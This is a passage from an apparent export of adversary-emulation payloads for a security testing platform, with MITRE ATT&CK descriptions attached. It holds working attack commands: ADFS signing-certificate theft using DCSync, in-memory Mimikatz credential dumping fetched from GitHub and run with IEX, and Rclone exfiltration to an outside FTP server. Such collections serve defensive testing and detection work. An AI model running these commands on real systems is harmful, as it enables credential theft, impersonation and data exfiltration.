          "attack_pattern_description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.",
          "attack_pattern_external_id": "T1552.004",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "psh",
      "payload_cleanup_command": "Remove-Item -Path \".\\ADFS_encryption.pfx\" -ErrorAction Ignore\nRemove-Item -Path \".\\ADFS_signing.pfx\" -ErrorAction Ignore\n",
      "payload_elevation_required": false,
      "payload_arguments": [],
      "payload_prerequisites": [
        {
          "executor": "psh",
          "get_command": "Install-Module -Name AADInternals -Force\n",
          "check_command": "if (Get-Module AADInternals) {exit 0} else {exit 1}\n",
          "description": "AADInternals module must be installed.\n"
        }
      ],
      "payload_external_id": "78e95057-d429-4e66-8f82-0f060c1ac96f",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:29.712385Z",
      "payload_updated_at": "2025-06-20T10:17:12.645679Z",
      "command_executor": "psh",
      "command_content": "Import-Module AADInternals -Force\nExport-AADIntADFSCertificates\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "f339328d-1b5f-430f-a4c6-cb46d18ee79b",
        "attack_pattern_name": "Private Keys",
        "attack_pattern_description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.",
        "attack_pattern_external_id": "T1552.004",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "ADFS token signing and encryption certificates theft - Remote",
      "payload_description": "Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.\nBased on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "f339328d-1b5f-430f-a4c6-cb46d18ee79b",
          "attack_pattern_name": "Private Keys",
          "attack_pattern_description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.",
          "attack_pattern_external_id": "T1552.004",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "psh",
      "payload_cleanup_command": "Remove-Item -Path \".\\ADFS_encryption.pfx\" -ErrorAction Ignore\nRemove-Item -Path \".\\ADFS_signing.pfx\" -ErrorAction Ignore\n",
      "payload_elevation_required": false,
      "payload_arguments": [
        {
          "type": "text",
          "key": "adfs_service_account_name",
          "default_value": "adfs_svc",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "replication_user",
          "default_value": "Administrator",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "replication_password",
          "default_value": "ReallyStrongPassword",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "adfs_server_name",
          "default_value": "sts.contoso.com",
          "description": null,
          "separator": null
        }
      ],
      "payload_prerequisites": [
        {
          "executor": "psh",
          "get_command": "Install-Module -Name AADInternals -Force\n",
          "check_command": "if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}\n",
          "description": "AADInternals and ActiveDirectory modules must be installed.\n"
        }
      ],
      "payload_external_id": "cab413d8-9e4a-4b8d-9b84-c985bd73a442",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:29.729751Z",
      "payload_updated_at": "2025-06-20T10:17:12.666754Z",
      "command_executor": "psh",
      "command_content": "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq \"#{adfs_service_account_name}\"\n$PWord = ConvertTo-SecureString -String \"#{replication_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord\n# use DCSync to fetch the ADFS service account's NT hash\n$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex\n$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}\n# Get certificates decryption key\n$Configuration = [xml]$ADFSConfig\n$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group\n$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName\n$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn\n$base = \"LDAP://CN=$group,$container,$parent\"\n$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))\n$ADSearch.Filter = '(name=CryptoPolicy)'\n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"displayName\") | Out-Null\n$aduser = $ADSearch.FindOne()\n$keyObjectGuid = $ADUser.Properties[\"displayName\"] \n$ADSearch.PropertiesToLoad.Clear()\n$ADSearch.PropertiesToLoad.Add(\"thumbnailphoto\") | Out-Null\n$ADSearch.Filter=\"(l=$keyObjectGuid)\"\n$aduser=$ADSearch.FindOne() \n$key=[byte[]]$aduser.Properties[\"thumbnailphoto\"][0] \n# Get encrypted certificates from configuration and decrypt them\nExport-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key\nGet-ChildItem | Where-Object {$_ -like \"ADFS*\"}\nWrite-Host \"`nCertificates retrieved successfully\"\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "f339328d-1b5f-430f-a4c6-cb46d18ee79b",
        "attack_pattern_name": "Private Keys",
        "attack_pattern_description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)\n\nOn network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) \n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.",
        "attack_pattern_external_id": "T1552.004",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "In-Memory Mimikatz- DumpCreds",
      "payload_description": "In-Memory Mimikatz",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "9fabc664-7f82-4f22-9411-f64569aeb1e0",
          "attack_pattern_name": "LSASS Memory",
          "attack_pattern_description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* <code>procdump -ma lsass.exe lsass_dump</code>\n\nLocally, mimikatz can be run using:\n\n* <code>sekurlsa::Minidump lsassdump.dmp</code>\n* <code>sekurlsa::logonPasswords</code>\n\nBuilt-in Windows tools such as `comsvcs.dll` can also be used:\n\n* <code>rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\nSimilar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n",
          "attack_pattern_external_id": "T1003.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": null,
      "payload_cleanup_command": null,
      "payload_elevation_required": false,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "56a1b6bb-f403-41be-993c-bdda2467978b",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [
        {
          "output_parser_id": "6e4b23ad-f709-4bc6-8088-e6e87c39f33c",
          "output_parser_mode": "STDOUT",
          "output_parser_type": "REGEX",
          "output_parser_contract_output_elements": [
            {
              "contract_output_element_id": "b878d7c7-9647-44c8-8724-c00d11994778",
              "contract_output_element_is_finding": true,
              "contract_output_element_rule": "(?:\\\\t|\\s)*\\*?\\s*Username\\s*:\\s*([^\\s\\\\r\\\\n]+)[\\s\\S]*?NTLM\\s*:\\s*([A-Fa-f0-9]{32})",
              "contract_output_element_name": "Mimikatz_Memory_NTLM",
              "contract_output_element_regex_groups": [
                {
                  "regex_group_id": "0b8513f7-de4e-43e5-923f-e05ded1e0ca6",
                  "regex_group_field": "password",
                  "regex_group_index_values": "$2",
                  "regex_group_created_at": "2025-09-11T15:22:19.200517Z",
                  "regex_group_updated_at": "2025-09-11T15:22:19.200517Z"
                },
                {
                  "regex_group_id": "7481286e-2eb5-41ed-8021-8320ac95cf09",
                  "regex_group_field": "username",
                  "regex_group_index_values": "$1",
                  "regex_group_created_at": "2025-09-11T15:22:19.200517Z",
                  "regex_group_updated_at": "2025-09-11T15:22:19.200517Z"
                }
              ],
              "contract_output_element_key": "Mimikatz_Memory_NTLM",
              "contract_output_element_type": "credentials",
              "contract_output_element_tags": [],
              "contract_output_element_created_at": "2025-09-11T15:22:19Z",
              "contract_output_element_updated_at": "2025-09-11T15:22:19Z"
            }
          ],
          "output_parser_created_at": "2025-09-11T15:22:19.200026Z",
          "output_parser_updated_at": "2025-09-11T15:22:19.200026Z"
        }
      ],
      "payload_created_at": "2025-09-11T14:32:38.885665Z",
      "payload_updated_at": "2025-09-11T15:22:19.199803Z",
      "command_executor": "psh",
      "command_content": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/master/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_arguments_documents": [],
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "9fabc664-7f82-4f22-9411-f64569aeb1e0",
        "attack_pattern_name": "LSASS Memory",
        "attack_pattern_description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* <code>procdump -ma lsass.exe lsass_dump</code>\n\nLocally, mimikatz can be run using:\n\n* <code>sekurlsa::Minidump lsassdump.dmp</code>\n* <code>sekurlsa::logonPasswords</code>\n\nBuilt-in Windows tools such as `comsvcs.dll` can also be used:\n\n* <code>rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID  lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\nSimilar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages</code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n",
        "attack_pattern_external_id": "T1003.001",
        "attack_pattern_kill_chain_phases": null
      }
    ]
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Process Discovery - ps",
      "payload_description": "Utilize ps to identify processes.",
      "payload_platforms": [
        "Linux",
        "MacOS"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "6282476a-f47e-4c81-821f-471a413f78c0",
          "attack_pattern_name": "Process Discovery",
          "attack_pattern_description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)",
          "attack_pattern_external_id": "T1057",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": null,
      "payload_cleanup_command": null,
      "payload_elevation_required": false,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "4cd2c65a-8b86-4ff5-9c0d-dc1d39de76a7",
      "payload_source": "FILIGRAN",
      "payload_expectations": [],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [
        {
          "output_parser_id": "db6d88e1-5e87-414e-954c-466423bfa86d",
          "output_parser_mode": "STDOUT",
          "output_parser_type": "REGEX",
          "output_parser_contract_output_elements": [
            {
              "contract_output_element_id": "ad49220c-2cfe-4093-9372-eeb2215243c5",
              "contract_output_element_is_finding": true,
              "contract_output_element_rule": "^\\S+\\s+(\\d+)",
              "contract_output_element_name": "PID",
              "contract_output_element_regex_groups": [
                {
                  "regex_group_id": "1f368c20-97bf-4d26-95af-f923851dd7f8",
                  "regex_group_field": "number",
                  "regex_group_index_values": "$1",
                  "regex_group_created_at": "2025-07-30T05:56:56.205819Z",
                  "regex_group_updated_at": "2025-07-30T05:56:56.205819Z"
                }
              ],
              "contract_output_element_key": "pid",
              "contract_output_element_type": "number",
              "contract_output_element_tags": [],
              "contract_output_element_created_at": "2025-07-30T05:56:56Z",
              "contract_output_element_updated_at": "2025-07-30T05:56:56Z"
            },
            {
              "contract_output_element_id": "eea65ac8-4f67-4b18-b720-5435e80cbfb7",
              "contract_output_element_is_finding": true,
              "contract_output_element_rule": "^(\\S+)",
              "contract_output_element_name": "User",
              "contract_output_element_regex_groups": [
                {
                  "regex_group_id": "afdfc00a-9fca-4036-8d6d-844498d576b6",
                  "regex_group_field": "text",
                  "regex_group_index_values": "$1",
                  "regex_group_created_at": "2025-07-30T05:56:56.205819Z",
                  "regex_group_updated_at": "2025-07-30T05:56:56.205819Z"
                }
              ],
              "contract_output_element_key": "user",
              "contract_output_element_type": "text",
              "contract_output_element_tags": [],
              "contract_output_element_created_at": "2025-07-30T05:56:56Z",
              "contract_output_element_updated_at": "2025-07-30T05:56:56Z"
            },
            {
              "contract_output_element_id": "ba612fc1-0b78-4d10-8c69-f417bde81076",
              "contract_output_element_is_finding": true,
              "contract_output_element_rule": "^\\S+\\s+\\d+\\s+[\\d\\.]+\\s+[\\d\\.]+\\s+\\d+\\s+\\d+\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+(.+)$",
              "contract_output_element_name": "Command",
              "contract_output_element_regex_groups": [
                {
                  "regex_group_id": "a7b9de78-3766-4f2b-8482-8e15fbe41c17",
                  "regex_group_field": "text",
                  "regex_group_index_values": "$1",
                  "regex_group_created_at": "2025-07-30T05:56:56.205819Z",
                  "regex_group_updated_at": "2025-07-30T05:56:56.205819Z"
                }
              ],
              "contract_output_element_key": "command",
              "contract_output_element_type": "text",
              "contract_output_element_tags": [],
              "contract_output_element_created_at": "2025-07-30T05:56:56Z",
              "contract_output_element_updated_at": "2025-07-30T05:56:56Z"
            }
          ],
          "output_parser_created_at": "2025-07-30T05:56:56.205819Z",
          "output_parser_updated_at": "2025-07-30T05:56:56.205819Z"
        }
      ],
      "payload_created_at": "2025-06-20T09:48:36.121608Z",
      "payload_updated_at": "2025-07-30T05:56:56.205302Z",
      "command_executor": "sh",
      "command_content": "ps aux --no-headers",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "6282476a-f47e-4c81-821f-471a413f78c0",
        "attack_pattern_name": "Process Discovery",
        "attack_pattern_description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nIn Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or <code>Get-Process</code> via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via `/proc`. ESXi also supports use of the `ps` command, as well as `esxcli system process list`.(Citation: Sygnia ESXi Ransomware 2025)(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)\n\nOn network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)",
        "attack_pattern_external_id": "T1057",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "Exfiltration Over Alternative Protocol - FTP - Rclone",
      "payload_description": "Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.\n[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7",
          "attack_pattern_name": "Exfiltration Over Unencrypted Non-C2 Protocol",
          "attack_pattern_description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ",
          "attack_pattern_external_id": "T1048.003",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": null,
      "payload_cleanup_command": null,
      "payload_elevation_required": true,
      "payload_arguments": [
        {
          "type": "text",
          "key": "ftp_server",
          "default_value": "ftp.dlptest.com",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "ftp_pass",
          "default_value": "rNrKYTX9g7z3RgJRmxWuGHbeu",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "ftp_user",
          "default_value": "dlpuser",
          "description": null,
          "separator": null
        },
        {
          "type": "text",
          "key": "ftp_port",
          "default_value": "21",
          "description": null,
          "separator": null
        }
      ],
      "payload_prerequisites": [
        {
          "executor": "psh",
          "get_command": "fsutil file createnew C:\\Users\\Public\\Downloads\\exfil.zip 20485760\n",
          "check_command": "if (Test-Path C:\\Users\\Public\\Downloads\\exfil.zip) {exit 0} else {exit 1}\n",
          "description": "Check if the exfil package exists\n"
        },
        {
          "executor": "psh",
          "get_command": "Invoke-WebRequest -Uri \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\" -OutFile \"C:\\Users\\Public\\Downloads\\rclone-current-windows-amd64.zip\"\nExpand-Archive C:\\Users\\Public\\Downloads\\rclone-current-windows-amd64.zip -DestinationPath C:\\Users\\Public\\Downloads\\\n",
          "check_command": "if (Test-Path C:\\Users\\Public\\Downloads\\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}\n",
          "description": "Check if rclone zip exists"
        }
      ],
      "payload_external_id": "58d33f75-cf14-4008-ae8d-d2cdcf1b5b0a",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:40.999361Z",
      "payload_updated_at": "2025-07-30T05:23:04.333440Z",
      "command_executor": "psh",
      "command_content": "$rclone_bin = Get-ChildItem C:\\Users\\Public\\Downloads\\ -Recurse -Include \"rclone.exe\" | Select-Object -ExpandProperty FullName\n$exfil_pack = Get-ChildItem C:\\Users\\Public\\Downloads\\ -Recurse -Include \"exfil.zip\" | Select-Object -ExpandProperty FullName\n&$rclone_bin config create ftpserver \"ftp\" \"host\" #{ftp_server} \"port\" #{ftp_port} \"user\" #{ftp_user} \"pass\" #{ftp_pass}\n&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        },
        {
          "domain_name": "Data Exfiltration",
          "domain_color": "#9933CC"
        },
        {
          "domain_name": "Network",
          "domain_color": "#009933"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "2510c51f-dfce-4b7f-b860-1b69ed4654b7",
